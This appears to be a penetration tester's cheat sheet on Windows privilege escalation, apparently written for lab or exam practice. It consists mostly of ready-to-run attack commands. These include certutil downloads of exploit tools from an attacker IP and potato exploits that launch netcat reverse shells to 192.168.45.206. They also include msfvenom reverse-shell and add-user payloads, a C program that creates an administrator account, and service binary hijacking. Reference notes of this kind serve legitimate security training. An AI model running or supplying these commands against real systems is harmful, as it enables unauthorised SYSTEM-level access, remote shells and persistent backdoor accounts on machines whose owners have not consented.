Windows Privesc

Privilege Escalation

Find Commands

# Find flag
Get-ChildItem -Path C:\ -Recurse -Include "proof.txt", "local.txt" -Force 2>$null
dir /s/b local.txt
dir C:\local.txt /s /b 2>nul
dir C:\proof.txt /s /b 2>nul

# Files
tree /f /a
tree /s/b *.log
dir /s/b john\*.txt

Potato Attacks

Identify

# Identify privileges & privileges that may be of interest
whoami /priv
SeImpersonatePrivilege, SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, SeDebug
# SeRemoteShutdownPrivilege, SeShutdownPrivilege (local only). To shutdown
shutdown /r /m \\target -t 0 /f or shutdown -r -t 1

# Check for security patches
systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
Locate the CVE, check if it's patched.

GodPotato

# GodPotato https://github.com/BeichenDream/GodPotato/releases
# Identify the NET framework version
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

certutil -urlcache -split -f http://192.168.45.206/GodPotato-NET4.exe
.\GodPotato-NET4.exe -cmd "whoami"
[*] CurrentUser: NT AUTHORITY\SYSTEM

# Shell
certutil -urlcache -split -f http://192.168.45.206/nc64.exe
.\GodPotato-NET4.exe -cmd ".\nc64.exe 192.168.45.206 420 -e c:\windows\system32\cmd.exe"

JuicyPotato

# http://ohpe.it/juicy-potato/CLSID/
# https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe
# https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www
\nc.exe -e cmd.exe 192.168.45.206 4445" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

SigmaPotato

# SigmaPotato
# https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
certutil -urlcache -split -f http://192.168.45.162/SigmaPotato.exe SigmaPotato.exe

.\SigmaPotato "net user qais Password /add" # net user
.\SigmaPotato "net localgroup Administrators qais /add" # net localgroup administrators

/usr/bin/impacket-psexec [email protected]
evil-winrm -i 192.168.45.162 -u qais -p Password

PrintSpoofer

# https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
PrintSpoofer.exe -i -c cmd

C:\WINDOWS\system32>whoami
nt authority\system

AlwaysInstallElevated

# If these 2 registers are enabled (value is 0x1)
# Then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

msfvenom -p windows/adduser USER=qais PASS=Password123 -f msi -o pfs.msi

# Run the payload
msiexec /quiet /qn /i C:\Users\John\Documents\pfs.msi

# Run CMD as administrator, login with qais

RunAs

# With GUI access & creds
PS C:\Users\steve> runas /user:backup cmd

runas /savecred /user:WORKGROUP\Administrator "\\192.168.45.162\share\rev.exe"
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe"

Unquoted Service Paths

# Identify
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
Get-ModifiableServiceFile # PowerUp

# List services
sc query
net start / net stop
Get-Service

# Info of a service
sc.exe qc

# Check permissions
icacls "C:\Path" (RX,W)
Get-ACL

# Payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.208 LPORT=4444 -f exe > ServiceName.exe
msfvenom -p windows/exec CMD='net user qais password123! /add && net localgroup administrators qais /add' -f exe-service -o ServiceName.exe
#include <stdlib.h>
int main ()
{
  int i;
 
  i = system ("net user qais password123! /add");
  i = system ("net localgroup administrators qais /add");
 
  return 0;
}
# x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

# Copy exe to correct dir
# Restart
shutdown /r /t 0 # To issue reboot, must have the SeShutDownPrivilege
net stop
Restart-Service Service
Start-Service Service

Service Binary Path

# Identify services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

# Check permissions
# Transfer payload

# Move the binary to restore it later
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

# Restart

# Check if it's "automatic" for reboot if net stop doesn't work
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}

# Confirm
Get-LocalGroupMember administrators

WSL

file c
c: directory
mount -t drvfs C: /mnt/c
cd c

Windows - Privilege Escalation - Internal All The Thingsswisskyrepo.github.io

Page not found - HackTricksbook.hacktricks.xyz

Basic Win CMD for Pentesters - HackTricksbook.hacktricks.xyz

LOLBASlolbas-project.github.io

LOFLCABlofl-project.github.io

PreviousWindown Enumeration NextMaintaining Access

Last updated 14 days ago

hashtagPrivilege Escalation

hashtagFind Commands

hashtagPotato Attacks

hashtagIdentify

hashtagGodPotato

hashtagJuicyPotato

hashtagSigmaPotato

hashtagPrintSpoofer

hashtagAlwaysInstallElevated

hashtagRunAs

hashtagUnquoted Service Paths

hashtagService Binary Path

hashtagWSL

Privilege Escalation

Find Commands

Potato Attacks

Identify

GodPotato

JuicyPotato

SigmaPotato

PrintSpoofer

AlwaysInstallElevated

RunAs

Unquoted Service Paths

Service Binary Path

WSL